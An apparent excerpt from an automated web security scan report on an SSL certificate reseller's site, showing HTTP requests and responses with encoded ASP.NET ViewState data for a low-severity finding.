GET /ssl-promotion-code HTTP/1.1
Host: www.sslmatrix.com
Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ssl+certificates#q=ssl+certificates&hl=en&prmd=ivnsufd&source=lnms&tbm=shop&ei=_5tiTr_COO_SiAKums2VCg&sa=X&oi=mode_link&ct=mode&cd=5&ved=0CFYQ_AUoBA&bav=on.2,or.r_gc.r_pw.&fp=d8e70e66cd7c7a51&biw=1233&bih=1037
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:44:08 GMT
Content-Length: 37574

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1">
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUINTExODkxNDUPZBYCZg9kFgJmD2QWBAIBD2QWAmYPZBYEZg8WAh4EVGV4dAWCAzxtZXRhIG5hbWU9IktleXdvcmRzIiBjb250ZW50PSJUaGF3dGUgUHJvbW90aW9uYWwgQ29kZSwgVGhhd3RlIFByb21vIGNvZGUsIFJhcGlkU1NMIFByb21vdGlvbmFsIENvZGUsIFJhcGlkU1NMIFByb21vIENvZGUsIEdlb1RydXN0IFByb21vdGlvbmFsIENvZGUsIEdlb1RydXN0IFByb21vIENvZGUsIFJhcGlkU1NMIENlcnRpZmljYXRlIFByb21vdGlvbmFsIENvZGUsIFRoYXd0ZSBQcm9tb3Rpb25hbCBDb2RlLCBXaWxkY2FyZCBTU0wgUHJvbW90aW9uYWwgQ29kZSwgRVYgU1NMIFByb21vdGlvbmFsIENvZGUsIFF1aWNrU1NMIFByb21vdGlvbmFsIENvZGUsIFNTTCBXZWJTZXJ2ZXIgUHJvbW90aW9uYWwgQ29kZSwgUXVpY2tTU0wgUHJlbWl1bSBQcm9tb3Rpb25hbCBDb2RlIi8+ZAIBDxYCHwAFqwI8bWV0YSBuYW1lPSJEZXNjcmlwdGlvbiIgY29udGVudD0iUHJvbW90aW9uYWwgY29kZSBmb3IgUHJvbW90aW9uYWwgQ29kZSBmb3IgVGhhd3RlIFJhcGlkU1NMIEdlb1RydXN0LiBTU0wgQ291cG9uIENvZGVzIGZvciBUaGF3dGUgU1NMMTIzLCBTU0wgV2ViU2VydmVyLCBSYXBpZFNTTCBDZXJ0aWZpY2F0ZSwgV2lsZGNhcmQgU1NMLCBFViBTU0wsIFF1aWNrU1NMIFByZW1pdW0uIFByb21vdGlvbmFsIENvZGVzIGFuZCBidXkgQ2hlYXAgU1NMIENlcnRpZmljYXRlcyBmcm9tIFRoYXd0ZSwgUmFwaWRTU0wsIEdlb1RydXN0LiIvPmQCAw8WAh4GYWN0aW9uBRMvc3NsLXByb21vdGlvbi1jb2RlFgICAQ9kFgoCAQ9kFgJmD2QWAmYPZBYCAgEPFgIfAAX4DzxwIGNsYXNzPSJsb2dvX3BhZGRpbmciPjxhIGhyZWY9Ii8iPjxpbWcgc3JjPSIvaW1hZ2VzL2xvZ28ucG5nIiBib3JkZXI9IjAiIGFsdD0iQ2hlYXAgU1NMIiAvPjwvYT48L3A+DQo8ZGl2IGNsYXNzPSJ0b3BfdGV4dCI+R2xvYmFsIFN1cHBsaWVyIE9mIFRydXN0ZWQgU1NMIENlcnRpZmljYXRlcyAmYW1wOyBTaXRlIFNlYWwuPC9kaXY+DQo8IS0tIEJFR0lOIExpdmVQZXJzb24gTW9uaXRvci4gLS0+DQo8c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCI+Ly8gPCFbQ0RBVEFbDQogICAgICAgIHZhciBscE1UYWdDb25maWcgPSB7ICdscFNlcnZlcic6ICJzZXJ2ZXIuaWFkLmxpdmVwZXJzb24ubmV0IiwgJ2xwTnVtYmVyJzogIjU3OTM3ODAzIiwgJ2xwUHJvdG9jb2wnOiAiaHR0cHMiIH07DQogICAgICAgIGZ1bmN0aW9uIGxwQWRkTW9uaXRvclRhZyhzcmMpIHsNCiAgICAgICAgICAgIGlmICh0eXBlb2YgKHNyYykgPT0gJ3VuZGVmaW5lZCcgfHwgdHlwZW9mIChzcmMpID09ICdvYmplY3QnKSB7DQogICAgICAgICAgICAgICAgc3JjID0gbHBNVGFnQ29uZmlnLmxwTVRhZ1NyYyA/IGxwTVRhZ0NvbmZpZy5scE1UYWdTcmMgOiAnL2hjcC9odG1sL21UYWcuanMnOw0KICAgICAgICAgICAgfQ0KICAgICAgICAgICAgaWYgKHNyYy5pbmRleE9mKCdodHRwJykgIT0gMCkgew0KICAgICAgICAgICAgICAgIHNyYyA9IGxwTVRhZ0NvbmZpZy5scFByb3RvY29sICsgIjovLyIgKyBscE1UYWdDb25maWcubHBTZXJ2ZXIgKyBzcmMgKyAnP3NpdGU9JyArIGxwTVRhZ0NvbmZpZy5scE51bWJlcjsNCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIGVsc2Ugew0KICAgICAgICAgICAgICAgIGlmIChzcmMuaW5kZXhPZignc2l0ZT0nKSA8IDApIHsNCiAgICAgICAgICAgICAgICAgICAgaWYgKHNyYy5pbmRleE9mKCc/JykgPCAwKSBzcmMgPSBzcmMgKyAnPyc7IGVsc2Ugc3JjID0gc3JjICsgJyYnOyBzcmMgPSBzcmMgKyAnc2l0ZT0nICsgbHBNVGFnQ29uZmlnLmxwTnVtYmVyOw0KICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgIH07IHZhciBzID0gZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnc2NyaXB0Jyk7IHMuc2V0QXR0cmlidXRlKCd0eXBlJywgJ3RleHQvamF2YXNjcmlwdCcpOyBzLnNldEF0dHJpYnV0ZSgnY2hhcnNldCcsICdpc28tODg1OS0xJyk7IHMuc2V0QXR0cmlidXRlKCdzcmMnLCBzcmMpOyBkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgnaGVhZCcpLml0ZW0oMCkuYXBwZW5kQ2hpbGQocyk7DQogICAgICAgIH0gaWYgKHdpbmRvdy5hdHRhY2hFdmVudCkgd2luZG93LmF0dGFjaEV2ZW50KCdvbmxvYWQnLCBscEFkZE1vbml0b3JUYWcpOyBlbHNlIHdpbmRvdy5hZGRFdmVudExpc3RlbmVyKCJsb2FkIiwgbHBBZGRNb25pdG9yVGFnLCBmYWxzZSk7DQovLyBdXT48L3NjcmlwdD4NCjwhLS0gRU5EIExpdmVQZXJzb24gTW9uaXRvci4gLS0+IDwhLS0gTGl2ZSBDaGF0IENvZGUgRW5kcyBIZXJlICAtLT4gPCEtLSBFTkQgTGl2ZVBlcnNvbiBNb25pdG9yLiAtLT4gPCEtLSBHb29nbGUgQW5hbHl0aWNzIENvZGUgU3RhcnQgLS0+DQo8c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCI+Ly8gPCFbQ0RBVEFbDQp2YXIgZ2FKc0hvc3QgPSAoKCJodHRwczoiID09IGRvY3VtZW50LmxvY2F0aW9uLnByb3RvY29sKSA/ICJodHRwczovL3NzbC4iIDogImh0dHA6Ly93d3cuIik7DQpkb2N1bWVudC53cml0ZSh1bmVzY2FwZSgiJTNDc2NyaXB0IHNyYz0nIiArIGdhSnNIb3N0ICsgImdvb2dsZS1hbmFseXRpY3MuY29tL2dhLmpzJyB0eXBlPSd0ZXh0L2phdmFzY3JpcHQnJTNFJTNDL3NjcmlwdCUzRSIpKTsNCi8vIF1dPjwvc2NyaXB0Pg0KPHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPi8vIDwhW0NEQVRBWw0KdHJ5IHsNCnZhciBwYWdlVHJhY2tlciA9IF9nYXQuX2dldFRyYWNrZXIoIlVBLTExODU0MTEwLTQiKTsNCnBhZ2VUcmFja2VyLl90cmFja1BhZ2V2aWV3KCk7DQp9IGNhdGNoKGVycikge30NCi8vIF1dPjwvc2NyaXB0Pg0KPCEtLSBHb29nbGUgQW5hbHl0aWNzIENvZGUgRW5kIC0tPmQCBQ9kFgICAQ9kFgJmD2QWAmYPZBYCZg8WAh8ABcYKPGRpdiBjbGFzcz0iYmxvY2sgc3NsLWJ5LWJyYW5kIj4NCjxkaXYgY2xhc3M9ImJsb2NrLXRpdGxlIj48c3Bhbj5TU0wgYnkgQnJhbmQ8L3NwYW4+PC9kaXY+DQo8ZGl2IGNsYXNzPSJibG9jay1jb250ZW50Ij4NCjx1bD4NCjxsaT48YSBocmVmPSIvc3NsLWJyYW5kcy9yYXBpZHNzbCI+DQo8aDE+UmFwaWRTU0w8L2gxPg0KPC9hPjwvbGk+DQo8bGk+PGEgaHJlZj0iL3NzbC1icmFuZHMvZ2VvdHJ1c3Qtc3NsIj4NCjxoMT5HZW9UcnVzdDwvaDE+DQo8L2E+PC9saT4NCjxsaSBjbGFzcz0ibGFzdCI+PGEgaHJlZj0iL3NzbC1icmFuZHMvdGhhd3RlLXNzbCI+DQo8aDE+VGhhd3RlPC9oMT4NCjwvYT48L2xpPg0KPGxpIGNsYXNzPSJ0aXRsZSI+U1NMIGJ5IFByaWNlPC9saT4NCjxsaT48YSBocmVmPSIvc3NsLXByb21vdGlvbi1jb2RlL3NzbC1wcmljZSMwdG81MCI+JDAgLSAkNTA8L2E+PC9saT4NCjxsaT48YSBocmVmPSIvc3NsLXByb21vdGlvbi1jb2RlL3NzbC1wcmljZSM1MHRvMTAwIj4kNTAgLSAkMTAwPC9hPjwvbGk+DQo8bGk+PGEgaHJlZj0iL3NzbC1wcm9tb3Rpb24tY29kZS9zc2wtcHJpY2UjMTAwdG8yMDAiPiQxMDAgLSAkMjAwPC9hPjwvbGk+DQo8bGkgY2xhc3M9Imxhc3QiPjxhIGhyZWY9Ii9zc2wtcHJvbW90aW9uLWNvZGUvc3NsLXByaWNlIzIwMCI+JDIwMCAtIE1vcmU8L2E+PC9saT4NCjxsaSBjbGFzcz0idGl0bGUiPlNTTCBieSBUeXBlPC9saT4NCjxsaT48YSBocmVmPSIvc3NsY2VydGlmaWNhdGVzL2RvbWFpbi1zc2wiPkRvbWFpbiBWYWxpZGF0aW9uIFNTTDwvYT48L2xpPg0KPGxpPjxhIGhyZWY9Ii9zc2xjZXJ0aWZpY2F0ZXMvYnVzaW5lc3MtdmFsaWRhdGlvbi1zc2wiPkJ1c2luZXNzIFZhbGlkYXRpb24gU1NMPC9hPjwvbGk+DQo8bGk+PGEgaHJlZj0iL3NzbGNlcnRpZmljYXRlcy93aWxkY2FyZC1jZXJ0aWZpY2F0ZXMiPg0KPGgxPldpbGRjYXJkIFNTTCBDZXJ0aWZpY2F0ZTwvaDE+DQo8L2E+PC9saT4NCjxsaT48YSBocmVmPSIvc3NsY2VydGlmaWNhdGVzL2V2LXNzbC1jZXJ0aWZpY2F0ZXMiPg0KPGgxPkVWIFNTTCBDZXJ0aWZpY2F0ZTwvaDE+DQo8L2E+PC9saT4NCjxsaSBjbGFzcz0ibGFzdCI+PGEgaHJlZj0iL3NzbGNlcnRpZmljYXRlcy9jb2RlLXNpZ25pbmctY2VydGlmaWNhdGUiPg0KPGgxPkNvZGUgU2lnbmluZyBDZXJ0aWZpY2F0ZTwvaDE+DQo8L2E+PC9saT4NCjwvdWw+DQo8L2Rpdj4NCjwvZGl2Pg0KPHAgc3R5bGU9InRleHQtYWxpZ246IGNlbnRlcjsgY2xlYXI6IGJvdGg7Ij4NCjxzY3JpcHQgc3JjPSJodHRwczovL3NtYXJ0aWNvbi5nZW90cnVzdC5jb20vc2kuanMiIHR5cGU9InRleHQvamF2YXNjcmlwdCI+PC9zY3JpcHQ+DQo8L3A+ZAIGD2QWAmYPZBYCZg9kFgJmDxYCHwAF3Q88aDE+DQo8cCBzdHlsZT0idGV4dC1hbGlnbjogY2VudGVyOyI+PHNwYW4gc3R5bGU9ImZvbnQtc2l6ZTogbGFyZ2U7Ij48c3Ryb25nPlNTTCBDZXJ0aWZpY2F0ZSBTcGVjaWFsIERpc2NvdW50IE9mZmVyPC9zdHJvbmc+PC9zcGFuPjwvcD4NCjwvaDE+DQo8cCBzdHlsZT0idGV4dC1hbGlnbjogbGVmdDsiPiZuYnNwOzwvcD4NCjxwIHN0eWxlPSJ0ZXh0LWFsaWduOiBsZWZ0OyI+PHN0cm9uZz48c3BhbiBzdHlsZT0iZm9udC1zaXplOiBsYXJnZTsiPjxzcGFuIHN0eWxlPSJmb250LXNpemU6IHNtYWxsOyI+SG93IGRvIEkgZ2V0IGRpc2NvdW50IHByaWNlPzwvc3Bhbj48L3NwYW4+PC9zdHJvbmc+PC9wPg0KPHAgc3R5bGU9InRleHQtYWxpZ246IGxlZnQ7Ij4mbmJzcDs8L3A+DQo8cD5TU0xNYXRyaXggb2ZmZXIgdGhlIHNwZWNpYWwgZGlzY291bnQgcHJpY2Ugb24gUmFwaWRTU0wsIEdlb3RydXN0IGFuZCBUaGF3dGUgU1NMIGNlcnRpZmljYXRlcy4gQWxsIHRoZSBiZWxvdyBkaXNjb3VudCBvZmZlcnMgY29udGFpbnMgc3BlY2lhbCBESVNDT1VOVCBDT1VQT04gQ09ERS4gPHNwYW4gc3R5bGU9ImNvbG9yOiAjZmYwMDAwOyBiYWNrZ3JvdW5kLWNvbG9yOiAjZmZjYzk5OyI+WW91IHdvdWxkIGJlIGFzayB0byBwcm92aWRlIGNvdXBvbiBjb2RlIGF0IHRpbWUgb2YgU1NMIHB1cmNoYXNlIG9yIHBheW1lbnQgY29uZmlybWF0aW9uLjwvc3Bhbj4gU1NMIGRpc2NvdW50IG9mZmVycyBhcmUgZm9yIGxpbWl0ZWQgdGltZSBwZXJpb2Qgb25seS48L3A+DQo8cD4mbmJzcDs8L3A+DQo8dGFibGUgYm9yZGVyPSIwIiBjZWxsc3BhY2luZz0iOCIgY2VsbHBhZGRpbmc9IjIiPg0KPHRib2R5Pg0KPHRyPg0KPHRkPjxhIHRpdGxlPSJSYXBpZFNTTCBhdCAkOSBvbmx5IiBocmVmPSIvT3JkZXIvcXVpY2tvcmRlcj9waWQ9MSZhbXA7eXI9NSZhbXA7b3Q9bmV3JmFtcDtjYz1zbXIwOSI+PGltZyBzcmM9Ii9pbWFnZXMvcmFwaWRzc2wtY2VydGlmaWNhdGUuanBnIiBhbHQ9IlJhcGlkU1NMICQ5IiAvPjwvYT48L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48YSB0aXRsZT0iV2lsZGNhcmQgU1NMICQ5OSIgaHJlZj0iL09yZGVyL3F1aWNrb3JkZXI/cGlkPTImYW1wO3lyPTImYW1wO290PW5ldyZhbXA7Y2M9c21yOTkiPjxpbWcgc3JjPSIvaW1hZ2VzL3dpbGRjYXJkLWNlcnRpZmljYXRlLmpwZyIgYWx0PSJXaWxkY2FyZCBTU0wgQ2VydGlmaWNhdGUgJDk5IiAvPjwvYT48L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48YSB0aXRsZT0iR2VvdHJ1c3QgUXVpY2tTU0wgUHJlbWl1bSAkNDkiIGhyZWY9Ii9PcmRlci9xdWlja29yZGVyP3BpZD01JmFtcDt5cj0yJmFtcDtvdD1uZXcmYW1wO2NjPXNtZzQ5Ij48aW1nIHNyYz0iL2ltYWdlcy9xdWNpa3NzbC1wcmVtaXVtLmpwZyIgYWx0PSJHZW90cnVzdCBRdWNpa1NTTCAkNDkiIC8+PC9hPjwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxhIHRpdGxlPSJHZW90cnVzdCBFViBTU0wgJDEyMCIgaHJlZj0iL09yZGVyL3F1aWNrb3JkZXI/cGlkPTgmYW1wO3lyPTImYW1wO290PW5ldyZhbXA7Y2M9c21nMTIwIj48aW1nIHNyYz0iL2ltYWdlcy9ldi1zc2wtY2VydGlmaWNhdGUuanBnIiBhbHQ9IkNoZWFwIEVWIFNTTCAkMTIwIiAvPjwvYT48L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48YSB0aXRsZT0iVGhhd3RlIFNTTDEyMyAkMzkiIGhyZWY9Ii9PcmRlci9xdWlja29yZGVyP3BpZD0xMiZhbXA7eXI9MiZhbXA7b3Q9bmV3JmFtcDtjYz1zbXQzOSI+PGltZyBzcmM9Ii9pbWFnZXMvc3NsLTEyMy5qcGciIGFsdD0iVGhhd3RlIFNTTDEyMyAkMzkiIC8+PC9hPjwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxhIHRpdGxlPSJUaGF3dGUgV2ViU2VydmVyIFNTTCAkODkiIGhyZWY9Ii9PcmRlci9xdWlja29yZGVyP3BpZD0xMSZhbXA7eXI9MSZhbXA7b3Q9bmV3JmFtcDtjYz1zbXQ4OSI+PGltZyBzcmM9Ii9pbWFnZXMvc3NsLXdlYi1zZXJ2ZXIuanBnIiBhbHQ9IldlYiBTZXJ2ZXIgU1NMICQ4OSIgLz48L2E+PC90ZD4NCjwvdHI+DQo8L3Rib2R5Pg0KPC90YWJsZT5kAgcPZBYCAgEPZBYCZg9kFgJmD2QWAmYPZBYCZg8WAh8ABd4EPHAgc3R5bGU9InRleHQtYWxpZ246IGNlbnRlcjsiPjxpbWcgc3JjPSIvaW1hZ2VzLzMwZGF5c21vbmV5YmFjay5qcGciIGFsdD0iMzAgRGF5cyBNb25leSBCYWNrIiAvPjwvcD4NCjxwPiZuYnNwOzwvcD4NCjxkaXYgY2xhc3M9ImJsb2NrIHBsYXRpbnVtX3BhcnRuZXIiPg0KPGRpdiBjbGFzcz0iYmxvY2stdGl0bGUiPjxzcGFuPlNTTCBSZXNlbGxlcjwvc3Bhbj48L2Rpdj4NCjxkaXYgY2xhc3M9ImJsb2NrLWNvbnRlbnQiPjxpbWcgc3JjPSIvaW1hZ2VzL3JhcGlkX3NzbC5qcGciIGFsdD0iUmFwaWRTU0wiIC8+PGJyIC8+PGJyIC8+PGltZyBzcmM9Ii9pbWFnZXMvZ2VvdHJ1c3Rfc3NsLmpwZyIgYWx0PSJHZW9UcnVzdCIgLz48YnIgLz48YnIgLz48aW1nIHNyYz0iL2ltYWdlcy90aGF3dGVfc3NsLmpwZyIgYWx0PSJUaGF3dGUiIC8+PC9kaXY+DQo8L2Rpdj4NCjxkaXYgY2xhc3M9ImJsb2NrIHBheXBhbCI+DQo8ZGl2IGNsYXNzPSJibG9jay10aXRsZSI+PHNwYW4+V2UgQWNjZXB0PC9zcGFuPjwvZGl2Pg0KPGRpdiBjbGFzcz0iYmxvY2stY29udGVudCI+PGltZyBzcmM9Ii9pbWFnZXMvcGF5cGFsLmpwZyIgYWx0PSJQYXlQYWwgU1NMIiAvPjwvZGl2Pg0KPC9kaXY+ZAIJD2QWAmYPZBYCZg9kFgICAQ8WAh8ABfMGPGRpdiBjbGFzcz0iZm9vdGVyX3RvcCI+DQo8ZGl2IGNsYXNzPSJicm93c2VycyI+PGltZyBzcmM9Ii9pbWFnZXMvYnJvd3NlcnMuanBnIiBhbHQ9IiIgLz48L2Rpdj4NCjxkaXYgY2xhc3M9InB1cmNoYXNlIj48aW1nIHNyYz0iL2ltYWdlcy9wdXJjaGFzZS13b3Jrcy5qcGciIGFsdD0iQnV5IENoZWFwIFNTTCBDZXJ0aWZpY2F0ZXMiIC8+PC9kaXY+DQo8dWw+DQo8aDI+V2h5IFNTTE1hdHJpeC5jb20/PC9oMj4NCjxsaT4zMCBEYXkgMTAwJSBtb25leSBiYWNrIGd1YXJhbnRlZTwvbGk+DQo8bGk+RWFzeSBhbmQgc2VjdXJlIFNTTCBvcmRlciBwcm9jZXNzPC9saT4NCjxsaT5JbnN0YW50IFNTTCBpc3N1YW5jZSAtIDI0LzcvMzY1PC9saT4NCjxsaT5MaWZlIHNwYW4gZnJlZSBTU0wgcmVpc3N1ZSBpbnN1cmFuY2U8L2xpPg0KPGxpPldvcmxkIHdpZGUgYXV0aG9yaXplZCBTU0wgcmVzZWxsZXI8L2xpPg0KPGxpPkZyZWUgU1NMIHNpdGUgc2VhbCBvbiBTU0wgcHVyY2hhc2U8L2xpPg0KPC91bD4NCjwvZGl2Pg0KPGRpdiBjbGFzcz0iZm9vdGVyX2JvdHRvbSI+DQo8ZGl2IGNsYXNzPSJmb290ZXJfYm90dG9tX2xlZnQiPjxhIGhyZWY9Ii8iPkhvbWU8L2E+IHwgPGEgaHJlZj0iL3NzbC1icmFuZHMiPlNTTCBCcmFuZHM8L2E+IHwgPGEgaHJlZj0iL3NzbGNlcnRpZmljYXRlcyI+U1NMIENlcnRpZmljYXRlczwvYT4gfCA8YSBocmVmPSIvc3NsLXByb21vdGlvbi1jb2RlIj5TU0wgUHJvbW90aW9uPC9hPiB8IDxhIGhyZWY9Ii9TU0xUb29scyI+U1NMIFRvb2xzPC9hPiB8IDxhIGhyZWY9Ii9jb250YWN0dXMiPkNvbnRhY3QgVXM8L2E+IHwgPGEgaHJlZj0iL1NTTFRvb2xzL3doYXQtaXMtc3NsLWNlcnRpZmljYXRlIj5TU0wgRkFRczwvYT48L2Rpdj4NCjwvZGl2PmRk" />
...[SNIP]...

9.3. https://www.sslmatrix.com/ssl-promotion-code/ssl-price previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.sslmatrix.com
Path:	/ssl-promotion-code/ssl-price

Request

GET /ssl-promotion-code/ssl-price HTTP/1.1
Host: www.sslmatrix.com
Connection: keep-alive
Referer: https://www.sslmatrix.com/ssl-promotion-code
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=sbarsdjyp5j2be55zav4bkbo

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:26:06 GMT
Content-Length: 41273

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1">
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUINTExODkxNDUPZBYCZg9kFgJmD2QWBAIBD2QWAmYPZBYEZg8WAh4EVGV4dAXdATxtZXRhIG5hbWU9IktleXdvcmRzIiBjb250ZW50PSJTU0wgUHJpY2UsU1NMIENlcnRpZmljYXRlIFByaWNlLFNTTCBDZXJ0aWZpY2F0ZSBDb3N0LENvbXBhcmUgU1NMIENvc3QsIHNzbCBwcmljZXMsIHNzbCBjZXJ0aWZpY2F0ZSBwcmljaW5nLCBzc2wgY2VydGlmaWNhdGUgcHJpY2UsIFByaWNlIE1hdGNoLCBsb3cgY29zdCBzc2wgY2VydGlmaWNhdGUsIGNvbXBhcmUgU1NMIFByaWNlIi8+ZAIBDxYCHwAFoAI8bWV0YSBuYW1lPSJEZXNjcmlwdGlvbiIgY29udGVudD0iU1NMIENlcnRpZmljYXRlIFByaWNlOiBGaW5kIExvdyBDb3N0IFNTTCBDZXJ0aWZpY2F0ZXMsQ2hlYXAgU1NMIFByaWNlcyxTU0wgQ2VydGlmaWNhdGUgQ29zdCBmcm9tIFNTTCBNYXRyaXguIENvbXBhcmUgU1NMIENlcnRpZmljYXRlIFByaWNlIHRvIHB1cmNoYXNlIFNTTCBDZXJ0aWZpY2F0ZXMuIENvbXBhcmUgU1NMIENlcnRpZmljYXRlIENvc3QgdG8gc2VjdXJlIEUtQ29tbWVyY2UgdHJhbnNhY3Rpb24gZnJvbSBUcnVzdGVkIFNTTCBDQS4iLz5kAgMPFgIeBmFjdGlvbgUdL3NzbC1wcm9tb3Rpb24tY29kZS9zc2wtcHJpY2UWAgIBD2QWCgIBD2QWAmYPZBYCZg9kFgICAQ8WAh8ABfgPPHAgY2xhc3M9ImxvZ29fcGFkZGluZyI+PGEgaHJlZj0iLyI+PGltZyBzcmM9Ii9pbWFnZXMvbG9nby5wbmciIGJvcmRlcj0iMCIgYWx0PSJDaGVhcCBTU0wiIC8+PC9hPjwvcD4NCjxkaXYgY2xhc3M9InRvcF90ZXh0Ij5HbG9iYWwgU3VwcGxpZXIgT2YgVHJ1c3RlZCBTU0wgQ2VydGlmaWNhdGVzICZhbXA7IFNpdGUgU2VhbC48L2Rpdj4NCjwhLS0gQkVHSU4gTGl2ZVBlcnNvbiBNb25pdG9yLiAtLT4NCjxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0Ij4vLyA8IVtDREFUQVsNCiAgICAgICAgdmFyIGxwTVRhZ0NvbmZpZyA9IHsgJ2xwU2VydmVyJzogInNlcnZlci5pYWQubGl2ZXBlcnNvbi5uZXQiLCAnbHBOdW1iZXInOiAiNTc5Mzc4MDMiLCAnbHBQcm90b2NvbCc6ICJodHRwcyIgfTsNCiAgICAgICAgZnVuY3Rpb24gbHBBZGRNb25pdG9yVGFnKHNyYykgew0KICAgICAgICAgICAgaWYgKHR5cGVvZiAoc3JjKSA9PSAndW5kZWZpbmVkJyB8fCB0eXBlb2YgKHNyYykgPT0gJ29iamVjdCcpIHsNCiAgICAgICAgICAgICAgICBzcmMgPSBscE1UYWdDb25maWcubHBNVGFnU3JjID8gbHBNVGFnQ29uZmlnLmxwTVRhZ1NyYyA6ICcvaGNwL2h0bWwvbVRhZy5qcyc7DQogICAgICAgICAgICB9DQogICAgICAgICAgICBpZiAoc3JjLmluZGV4T2YoJ2h0dHAnKSAhPSAwKSB7DQogICAgICAgICAgICAgICAgc3JjID0gbHBNVGFnQ29uZmlnLmxwUHJvdG9jb2wgKyAiOi8vIiArIGxwTVRhZ0NvbmZpZy5scFNlcnZlciArIHNyYyArICc/c2l0ZT0nICsgbHBNVGFnQ29uZmlnLmxwTnVtYmVyOw0KICAgICAgICAgICAgfQ0KICAgICAgICAgICAgZWxzZSB7DQogICAgICAgICAgICAgICAgaWYgKHNyYy5pbmRleE9mKCdzaXRlPScpIDwgMCkgew0KICAgICAgICAgICAgICAgICAgICBpZiAoc3JjLmluZGV4T2YoJz8nKSA8IDApIHNyYyA9IHNyYyArICc/JzsgZWxzZSBzcmMgPSBzcmMgKyAnJic7IHNyYyA9IHNyYyArICdzaXRlPScgKyBscE1UYWdDb25maWcubHBOdW1iZXI7DQogICAgICAgICAgICAgICAgfQ0KICAgICAgICAgICAgfTsgdmFyIHMgPSBkb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTsgcy5zZXRBdHRyaWJ1dGUoJ3R5cGUnLCAndGV4dC9qYXZhc2NyaXB0Jyk7IHMuc2V0QXR0cmlidXRlKCdjaGFyc2V0JywgJ2lzby04ODU5LTEnKTsgcy5zZXRBdHRyaWJ1dGUoJ3NyYycsIHNyYyk7IGRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCdoZWFkJykuaXRlbSgwKS5hcHBlbmRDaGlsZChzKTsNCiAgICAgICAgfSBpZiAod2luZG93LmF0dGFjaEV2ZW50KSB3aW5kb3cuYXR0YWNoRXZlbnQoJ29ubG9hZCcsIGxwQWRkTW9uaXRvclRhZyk7IGVsc2Ugd2luZG93LmFkZEV2ZW50TGlzdGVuZXIoImxvYWQiLCBscEFkZE1vbml0b3JUYWcsIGZhbHNlKTsNCi8vIF1dPjwvc2NyaXB0Pg0KPCEtLSBFTkQgTGl2ZVBlcnNvbiBNb25pdG9yLiAtLT4gPCEtLSBMaXZlIENoYXQgQ29kZSBFbmRzIEhlcmUgIC0tPiA8IS0tIEVORCBMaXZlUGVyc29uIE1vbml0b3IuIC0tPiA8IS0tIEdvb2dsZSBBbmFseXRpY3MgQ29kZSBTdGFydCAtLT4NCjxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0Ij4vLyA8IVtDREFUQVsNCnZhciBnYUpzSG9zdCA9ICgoImh0dHBzOiIgPT0gZG9jdW1lbnQubG9jYXRpb24ucHJvdG9jb2wpID8gImh0dHBzOi8vc3NsLiIgOiAiaHR0cDovL3d3dy4iKTsNCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCIlM0NzY3JpcHQgc3JjPSciICsgZ2FKc0hvc3QgKyAiZ29vZ2xlLWFuYWx5dGljcy5jb20vZ2EuanMnIHR5cGU9J3RleHQvamF2YXNjcmlwdCclM0UlM0Mvc2NyaXB0JTNFIikpOw0KLy8gXV0+PC9zY3JpcHQ+DQo8c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCI+Ly8gPCFbQ0RBVEFbDQp0cnkgew0KdmFyIHBhZ2VUcmFja2VyID0gX2dhdC5fZ2V0VHJhY2tlcigiVUEtMTE4NTQxMTAtNCIpOw0KcGFnZVRyYWNrZXIuX3RyYWNrUGFnZXZpZXcoKTsNCn0gY2F0Y2goZXJyKSB7fQ0KLy8gXV0+PC9zY3JpcHQ+DQo8IS0tIEdvb2dsZSBBb